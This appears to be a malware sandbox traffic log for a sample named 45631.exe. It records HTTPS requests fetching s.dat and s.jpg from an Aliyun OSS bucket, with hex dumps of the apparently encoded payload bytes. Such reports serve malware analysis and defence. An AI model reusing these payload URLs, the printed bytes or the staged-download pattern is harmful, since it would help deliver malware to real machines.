                                                  2025-01-02 11:14:13 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                                                  Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                  2025-01-02 11:14:13 UTC4096INData Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97
                                                  Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                  2025-01-02 11:14:13 UTC4096INData Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79
                                                  Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
                                                  2025-01-02 11:14:13 UTC4096INData Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85
                                                  Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                  2025-01-02 11:14:13 UTC4096INData Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3
                                                  Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                  2025-01-02 11:14:13 UTC4096INData Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af
                                                  Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                  2025-01-02 11:14:13 UTC4096INData Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f
                                                  Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
                                                  2025-01-02 11:14:13 UTC4096INData Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96
                                                  Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.64998739.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:21 UTC111OUTGET /s.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:21 UTC559INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:21 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 28272
                                                  Connection: close
                                                  x-oss-request-id: 6776750DB980BA38324E6575
                                                  Accept-Ranges: bytes
                                                  ETag: "DB77A55916E3EC0311D54060C84F7F0F"
                                                  Last-Modified: Thu, 02 Jan 2025 11:13:55 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 2704622320052455568
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 23elWRbj7AMR1UBgyE9/Dw==
                                                  x-oss-server-time: 2
                                                  2025-01-02 11:14:21 UTC3537INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                  Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                  2025-01-02 11:14:21 UTC4096INData Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92
                                                  Data Ascii: ##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                  2025-01-02 11:14:21 UTC4096INData Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c
                                                  Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
                                                  2025-01-02 11:14:21 UTC4096INData Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b
                                                  Data Ascii: JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                  2025-01-02 11:14:21 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                  Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                  2025-01-02 11:14:21 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                  Data Ascii: ,$LDld=5}u]U
                                                  2025-01-02 11:14:21 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                                  Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                  2025-01-02 11:14:21 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 3d 1f dd f5
                                                  Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.64998839.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:22 UTC111OUTGET /s.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:23 UTC543INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:23 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 8299
                                                  Connection: close
                                                  x-oss-request-id: 6776750F9F6B6036348ED9DB
                                                  Accept-Ranges: bytes
                                                  ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                  Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 692387538176721524
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                  x-oss-server-time: 3
                                                  2025-01-02 11:14:23 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-02 11:14:23 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                                  Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                  2025-01-02 11:14:23 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
